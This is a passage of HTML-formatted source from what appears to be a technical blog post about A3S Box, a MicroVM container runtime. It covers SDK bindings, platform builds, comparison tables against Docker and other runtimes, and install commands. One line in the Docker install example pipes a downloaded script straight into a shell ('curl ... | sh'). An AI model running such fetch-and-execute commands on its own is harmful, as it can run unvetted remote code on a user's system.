        &lt;span class="na"&gt;memoryMib&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;

    &lt;span class="c1"&gt;// Execute command&lt;/span&gt;
    &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;sandbox&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;node&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;-e&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;console.log("hello")&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The advantage of napi-rs is that it produces a true native module (a &lt;code&gt;.node&lt;/code&gt; file) rather than going through FFI or subprocess calls. This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Zero serialization overhead (data passed directly between V8 heap and Rust heap)&lt;/li&gt;
&lt;li&gt;Complete TypeScript type definitions (auto-generated &lt;code&gt;.d.ts&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Supports async/await (via Tokio and libuv integration)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  19.5 Multi-Platform Builds
&lt;/h3&gt;

&lt;p&gt;SDK native bindings must be compiled separately for each target platform. A3S Box builds them through a GitHub Actions CI matrix:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Python wheels&lt;/th&gt;
&lt;th&gt;Node.js modules&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Linux x86_64&lt;/td&gt;
&lt;td&gt;maturin&lt;/td&gt;
&lt;td&gt;napi-rs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux aarch64&lt;/td&gt;
&lt;td&gt;maturin&lt;/td&gt;
&lt;td&gt;napi-rs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS x86_64&lt;/td&gt;
&lt;td&gt;maturin&lt;/td&gt;
&lt;td&gt;napi-rs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS aarch64 (Apple Silicon)&lt;/td&gt;
&lt;td&gt;maturin&lt;/td&gt;
&lt;td&gt;napi-rs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Python wheels are built via &lt;code&gt;maturin&lt;/code&gt; and published to PyPI; Node.js modules are built via &lt;code&gt;napi-rs&lt;/code&gt; and published to npm. Users only need &lt;code&gt;pip install a3s-box&lt;/code&gt; or &lt;code&gt;npm install @a3s/box&lt;/code&gt;, and the package manager automatically selects the correct platform variant.&lt;/p&gt;




&lt;h2&gt;
  
  
  20. Comparative Analysis with Existing Solutions
&lt;/h2&gt;

&lt;h3&gt;
  
  
  20.1 Container Runtime Landscape
&lt;/h3&gt;

&lt;p&gt;The current container runtime ecosystem can be divided into four levels by isolation strength:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Isolation strength ^
                   |
                   |  +------------------------------------------+
                   |  | A3S Box (TEE mode)                        |
                   |  | MicroVM + memory encryption + 7-layer defense |
                   |  +------------------------------------------+
                   |  +------------------------------------------+
                   |  | A3S Box (standard mode) / Kata Containers  |
                   |  | MicroVM + independent kernel               |
                   |  +------------------------------------------+
                   |  +------------------------------------------+
                   |  | gVisor                                     |
                   |  | Userspace kernel (syscall interception)    |
                   |  +------------------------------------------+
                   |  +------------------------------------------+
                   |  | runc (Docker default)                      |
                   |  | Shared kernel + namespace + cgroup         |
                   |  +------------------------------------------+
                   |
                   +-------------------------------------------&amp;gt; Performance overhead
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  20.2 Detailed Comparison
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;runc (Docker)&lt;/th&gt;
&lt;th&gt;gVisor&lt;/th&gt;
&lt;th&gt;Kata Containers&lt;/th&gt;
&lt;th&gt;Firecracker&lt;/th&gt;
&lt;th&gt;A3S Box&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Isolation mechanism&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;namespace + cgroup&lt;/td&gt;
&lt;td&gt;Userspace kernel&lt;/td&gt;
&lt;td&gt;MicroVM (QEMU/CLH)&lt;/td&gt;
&lt;td&gt;MicroVM (KVM)&lt;/td&gt;
&lt;td&gt;MicroVM (libkrun)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Kernel isolation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Shared&lt;/td&gt;
&lt;td&gt;Partial (Sentry)&lt;/td&gt;
&lt;td&gt;Independent&lt;/td&gt;
&lt;td&gt;Independent&lt;/td&gt;
&lt;td&gt;Independent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cold start&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~50ms&lt;/td&gt;
&lt;td&gt;~150ms&lt;/td&gt;
&lt;td&gt;~500ms-2s&lt;/td&gt;
&lt;td&gt;~125ms&lt;/td&gt;
&lt;td&gt;~200ms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Memory overhead&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~5 MB&lt;/td&gt;
&lt;td&gt;~15 MB&lt;/td&gt;
&lt;td&gt;~30-50 MB&lt;/td&gt;
&lt;td&gt;~5 MB&lt;/td&gt;
&lt;td&gt;~10 MB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TEE support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (SEV-SNP, TDX planned)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;macOS support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (Docker Desktop)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (native HVF)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Docker CLI compat&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native&lt;/td&gt;
&lt;td&gt;Partial&lt;/td&gt;
&lt;td&gt;Via shimv2&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (52 commands)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;K8s integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CRI&lt;/td&gt;
&lt;td&gt;CRI&lt;/td&gt;
&lt;td&gt;CRI&lt;/td&gt;
&lt;td&gt;containerd-shim&lt;/td&gt;
&lt;td&gt;CRI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Language&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Go&lt;/td&gt;
&lt;td&gt;Go&lt;/td&gt;
&lt;td&gt;Go + Rust&lt;/td&gt;
&lt;td&gt;Rust&lt;/td&gt;
&lt;td&gt;Rust&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Embedded SDK&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (Rust)&lt;/td&gt;
&lt;td&gt;Yes (Rust/Python/TS)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audit logs&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (26 operations)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Warm pool&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (auto-scaling)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;RA-TLS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Sealed storage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (3 policies)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Daemon required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (dockerd)&lt;/td&gt;
&lt;td&gt;Yes (runsc)&lt;/td&gt;
&lt;td&gt;Yes (shimv2)&lt;/td&gt;
&lt;td&gt;Yes (firecracker)&lt;/td&gt;
&lt;td&gt;No daemon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Binary size&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~200 MB (full)&lt;/td&gt;
&lt;td&gt;~50 MB&lt;/td&gt;
&lt;td&gt;~100 MB+&lt;/td&gt;
&lt;td&gt;~30 MB&lt;/td&gt;
&lt;td&gt;~40 MB (single binary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dependencies&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;dockerd + containerd + runc&lt;/td&gt;
&lt;td&gt;containerd + runsc&lt;/td&gt;
&lt;td&gt;containerd + shimv2 + QEMU&lt;/td&gt;
&lt;td&gt;firecracker + jailer&lt;/td&gt;
&lt;td&gt;Single binary, zero external deps&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  20.3 A3S Box vs Docker: Deep Comparison
&lt;/h3&gt;

&lt;p&gt;Docker is the de facto standard in the container ecosystem and the tool most developers know best. A close comparison with Docker shows where A3S Box's differentiated value lies.&lt;/p&gt;

&lt;h4&gt;
  
  
  20.3.1 Architecture Difference: Daemonless vs Daemon Model
&lt;/h4&gt;

&lt;p&gt;Docker uses a classic client-server architecture:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Docker architecture:
  docker CLI --&amp;gt; dockerd (daemon, always running in background)
                    |
                    +-- containerd (container lifecycle management)
                    |       |
                    |       +-- containerd-shim
                    |               |
                    |               +-- runc (OCI runtime)
                    |                     |
                    |                     +-- container process
                    |
                    +-- network/storage/logging plugins
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This architecture means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Must run &lt;code&gt;dockerd&lt;/code&gt; daemon (typically with root privileges)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;dockerd&lt;/code&gt; is a single point of failure — if the daemon crashes, management capability for all containers is lost&lt;/li&gt;
&lt;li&gt;The daemon itself is a high-value attack target (root privileges + controls all containers)&lt;/li&gt;
&lt;li&gt;Upgrading Docker requires restarting the daemon, potentially affecting running containers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A3S Box uses a daemonless architecture:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;A3S Box architecture:
  a3s-box CLI --&amp;gt; directly starts shim subprocess
                        |
                        +-- libkrun (library call, not separate process)
                                |
                                +-- MicroVM (independent kernel)
                                        |
                                        +-- Guest Init (PID 1)
                                                |
                                                +-- application process
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Advantages of daemonless:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No single point of failure&lt;/strong&gt;: Each MicroVM is managed by an independent shim subprocess; one VM's management process crashing doesn't affect other VMs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No privileged daemon&lt;/strong&gt;: Eliminates the Docker daemon as a high-value attack target&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero operational overhead&lt;/strong&gt;: No need to manage daemon startup, monitoring, log rotation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ready to use&lt;/strong&gt;: No &lt;code&gt;systemctl start docker&lt;/code&gt; needed; just execute the command directly&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  20.3.2 Size Comparison: 40MB vs 200MB+
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Docker&lt;/th&gt;
&lt;th&gt;A3S Box&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CLI&lt;/td&gt;
&lt;td&gt;docker (~50 MB)&lt;/td&gt;
&lt;td&gt;a3s-box (~40 MB, includes all features)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runtime daemon&lt;/td&gt;
&lt;td&gt;dockerd (~80 MB)&lt;/td&gt;
&lt;td&gt;Not needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Container management&lt;/td&gt;
&lt;td&gt;containerd (~50 MB)&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OCI runtime&lt;/td&gt;
&lt;td&gt;runc (~10 MB)&lt;/td&gt;
&lt;td&gt;Built-in (libkrun)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network plugins&lt;/td&gt;
&lt;td&gt;CNI plugins (~20 MB)&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~200 MB+&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~40 MB&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A3S Box compiles all functionality into a single Rust binary with no external dependencies. This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Minimal deployment&lt;/strong&gt;: Installation is a single file copy; no package manager needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simple version management&lt;/strong&gt;: One binary = one version, with no component version-skew issues&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Offline deployment friendly&lt;/strong&gt;: Air-gapped environments need only a single 40MB file transferred&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CI/CD cache efficient&lt;/strong&gt;: Caching one file is far faster than caching an entire Docker installation&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  20.3.3 Security Model Comparison
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Docker's isolation boundary:
+-------------------------------------+
|       Host Linux Kernel              |  &amp;lt;- All containers share this
|  +---------+  +---------+           |
|  | Cont. A  |  | Cont. B  |          |
|  | ns+cgroup|  | ns+cgroup|          |
|  +---------+  +---------+           |
|                                     |
|  Kernel vulnerability = all containers compromised  |
+-------------------------------------+

A3S Box's isolation boundary:
+-------------------------------------+
|       Host Linux Kernel              |
|  +--------------+  +--------------+ |
|  | MicroVM A     |  | MicroVM B     | |
|  | +----------+ |  | +----------+ | |
|  | |Indep.    | |  | |Indep.    | | |
|  | |kernel    | |  | |kernel    | | |
|  | |app proc  | |  | |app proc  | | |
|  | +----------+ |  | +----------+ | |
|  | HW virt boundary|  | HW virt boundary| |
|  +--------------+  +--------------+ |
|                                     |
|  VM A kernel vuln != VM B affected  |
+-------------------------------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key security differences:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Security Dimension&lt;/th&gt;
&lt;th&gt;Docker&lt;/th&gt;
&lt;th&gt;A3S Box&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Kernel sharing&lt;/td&gt;
&lt;td&gt;All containers share host kernel&lt;/td&gt;
&lt;td&gt;Each VM has independent kernel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Escape impact&lt;/td&gt;
&lt;td&gt;One container escape -&amp;gt; control all containers&lt;/td&gt;
&lt;td&gt;One VM escape -&amp;gt; only affects that VM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privileged daemon&lt;/td&gt;
&lt;td&gt;dockerd runs as root&lt;/td&gt;
&lt;td&gt;No daemon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory encryption&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (TEE, SEV-SNP)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote attestation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (RA-TLS)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Audit logs&lt;/td&gt;
&lt;td&gt;Basic (Docker events)&lt;/td&gt;
&lt;td&gt;Complete (26 operations, W7 model)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default Seccomp&lt;/td&gt;
&lt;td&gt;Allows ~300 syscalls&lt;/td&gt;
&lt;td&gt;Blocks 16 dangerous calls + arch validation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default Capabilities&lt;/td&gt;
&lt;td&gt;Retains 14&lt;/td&gt;
&lt;td&gt;All stripped&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h4&gt;
  
  
  20.3.4 Startup Speed Comparison
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Docker container startup (~50ms):
  [0ms]  dockerd receives request
  [5ms]  containerd creates container
  [10ms] runc sets up namespace + cgroup
  [20ms] pivot_root switches root filesystem
  [30ms] application process starts
  [50ms] ready

A3S Box MicroVM startup (~200ms):
  [0ms]   CLI receives request
  [20ms]  start shim subprocess
  [50ms]  libkrun creates VM + kernel boot
  [150ms] Guest Init mounts filesystems
  [180ms] configure network + start vsock servers
  [200ms] ready

A3S Box warm pool mode (~0ms):
  [0ms]   CLI receives request
  [0ms]   acquire ready VM from warm pool
  [0ms]   ready
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker does start faster (~50ms vs ~200ms), but the extra 150ms buys:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Upgrade from shared-kernel isolation to hardware virtualization isolation&lt;/li&gt;
&lt;li&gt;Optional TEE memory encryption&lt;/li&gt;
&lt;li&gt;Independent kernel (kernel vulnerabilities don't spread)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For latency-sensitive scenarios, the warm pool mechanism can reduce effective startup time to near zero.&lt;/p&gt;
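&lt;p&gt;The warm pool mechanism can be sketched in a few lines of Rust. This is an illustrative model only: the &lt;code&gt;WarmPool&lt;/code&gt; and &lt;code&gt;MicroVm&lt;/code&gt; names are hypothetical, and a real pool boots VMs in the background (~200ms each) rather than instantly:&lt;/p&gt;

```rust
use std::collections::VecDeque;

// Hypothetical handle for a booted MicroVM (illustrative only).
#[derive(Debug)]
struct MicroVm {
    id: u32,
}

struct WarmPool {
    ready: VecDeque<MicroVm>,
    target_size: usize,
    next_id: u32,
}

impl WarmPool {
    fn new(target_size: usize) -> Self {
        let mut pool = WarmPool {
            ready: VecDeque::new(),
            target_size,
            next_id: 0,
        };
        pool.refill(); // pre-boot VMs so the first acquire() is ~0ms
        pool
    }

    // A real runtime would boot a VM here (~200ms); the sketch is instant.
    fn boot_vm(&mut self) -> MicroVm {
        self.next_id += 1;
        MicroVm { id: self.next_id }
    }

    fn refill(&mut self) {
        while self.ready.len() < self.target_size {
            let vm = self.boot_vm();
            self.ready.push_back(vm);
        }
    }

    // Hand out a pre-booted VM; fall back to a cold boot if the pool is empty.
    fn acquire(&mut self) -> MicroVm {
        let vm = match self.ready.pop_front() {
            Some(vm) => vm,
            None => self.boot_vm(), // cold-start path
        };
        self.refill(); // a real pool replenishes in the background
        vm
    }
}

fn main() {
    let mut pool = WarmPool::new(2);
    let vm = pool.acquire(); // served from the pool, no boot on this path
    println!("got VM {}, {} still warm", vm.id, pool.ready.len());
}
```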

&lt;h4&gt;
  
  
  20.3.5 Developer Experience Comparison
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Docker&lt;/th&gt;
&lt;th&gt;A3S Box&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Installation&lt;/td&gt;
&lt;td&gt;Need to install Docker Desktop (macOS/Windows) or docker-ce (Linux)&lt;/td&gt;
&lt;td&gt;Download single binary, no installation needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS support&lt;/td&gt;
&lt;td&gt;Via Docker Desktop (requires HyperKit/VZ virtualization layer)&lt;/td&gt;
&lt;td&gt;Native Apple HVF, no intermediate layer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command compat&lt;/td&gt;
&lt;td&gt;Native&lt;/td&gt;
&lt;td&gt;52 compatible commands, consistent syntax&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dockerfile&lt;/td&gt;
&lt;td&gt;Native support&lt;/td&gt;
&lt;td&gt;Compatible with OCI image format&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SDK embedding&lt;/td&gt;
&lt;td&gt;Via Docker API (HTTP REST)&lt;/td&gt;
&lt;td&gt;Native Rust/Python/TypeScript SDK&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Resource usage&lt;/td&gt;
&lt;td&gt;Docker Desktop resident memory ~1-2 GB&lt;/td&gt;
&lt;td&gt;No resident process, start on demand&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;License&lt;/td&gt;
&lt;td&gt;Docker Desktop requires a paid subscription for commercial use in larger organizations&lt;/td&gt;
&lt;td&gt;MIT open source&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For developers, the cost of migrating from Docker to A3S Box is minimal:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Before migration&lt;/span&gt;
docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; web &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx
docker &lt;span class="nb"&gt;exec &lt;/span&gt;web curl localhost
docker logs web
docker stop web &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; docker &lt;span class="nb"&gt;rm &lt;/span&gt;web

&lt;span class="c"&gt;# After migration (just replace the command name)&lt;/span&gt;
a3s-box run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; web &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx
a3s-box &lt;span class="nb"&gt;exec &lt;/span&gt;web curl localhost
a3s-box logs web
a3s-box stop web &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; a3s-box &lt;span class="nb"&gt;rm &lt;/span&gt;web
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  20.3.6 Installation Method Comparison
&lt;/h4&gt;

&lt;p&gt;Docker installation varies by platform and typically requires multiple steps:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Docker on macOS -- requires downloading ~1GB Docker Desktop installer&lt;/span&gt;
&lt;span class="c"&gt;# 1. Download Docker Desktop .dmg&lt;/span&gt;
&lt;span class="c"&gt;# 2. Drag to install&lt;/span&gt;
&lt;span class="c"&gt;# 3. Start Docker Desktop (resident in background, uses 1-2 GB memory)&lt;/span&gt;
&lt;span class="c"&gt;# 4. Wait for dockerd to finish starting&lt;/span&gt;

&lt;span class="c"&gt;# Docker on Linux -- requires configuring apt/yum repository&lt;/span&gt;
curl &lt;span class="nt"&gt;-fsSL&lt;/span&gt; https://get.docker.com | sh
&lt;span class="nb"&gt;sudo &lt;/span&gt;systemctl &lt;span class="nb"&gt;enable&lt;/span&gt; &lt;span class="nt"&gt;--now&lt;/span&gt; docker
&lt;span class="nb"&gt;sudo &lt;/span&gt;usermod &lt;span class="nt"&gt;-aG&lt;/span&gt; docker &lt;span class="nv"&gt;$USER&lt;/span&gt;
&lt;span class="c"&gt;# Need to re-login to shell for changes to take effect&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A3S Box provides multiple lightweight installation methods, each completing in seconds:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Method 1: Homebrew (macOS / Linux)&lt;/span&gt;
brew tap A3S-Lab/homebrew-tap https://github.com/A3S-Lab/homebrew-tap.git
brew &lt;span class="nb"&gt;install &lt;/span&gt;a3s-box
&lt;span class="c"&gt;# Automatically downloads pre-compiled binary from GitHub Releases&lt;/span&gt;
&lt;span class="c"&gt;# Includes a3s-box CLI + a3s-box-shim + a3s-box-guest-init&lt;/span&gt;
&lt;span class="c"&gt;# Done. No daemon, no restart needed, immediately usable.&lt;/span&gt;

&lt;span class="c"&gt;# Method 2: Cargo (Rust developers)&lt;/span&gt;
cargo &lt;span class="nb"&gt;install &lt;/span&gt;a3s-box
&lt;span class="c"&gt;# Compile and install from source, automatically gets latest version&lt;/span&gt;

&lt;span class="c"&gt;# Method 3: Helm (Kubernetes cluster)&lt;/span&gt;
helm repo add a3s https://a3s-lab.github.io/charts
helm &lt;span class="nb"&gt;install &lt;/span&gt;a3s-box a3s/a3s-box
&lt;span class="c"&gt;# Deploy as DaemonSet in K8s cluster, automatically runs on each node&lt;/span&gt;

